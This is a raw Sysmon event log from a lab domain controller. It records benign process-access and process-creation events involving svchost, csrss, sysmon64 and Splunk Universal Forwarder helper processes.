13:27:15.359{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.359{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.359{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.359{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.359{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.359{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.359{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.359{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.359{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.359{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46B3-6000-EC04-000000009A01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.359{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46B3-6000-EC04-000000009A01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:15.219{08A6967A-46B3-6000-EC04-000000009A01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46B4-6000-EE04-000000009A01}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46B4-6000-EE04-000000009A01}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.702{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46B4-6000-EE04-000000009A01}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.703{08A6967A-46B4-6000-EE04-000000009A01}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.171{08A6967A-46B4-6000-ED04-000000009A01}43164544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:16.031{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46B4-6000-ED04-000000009A01}4316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 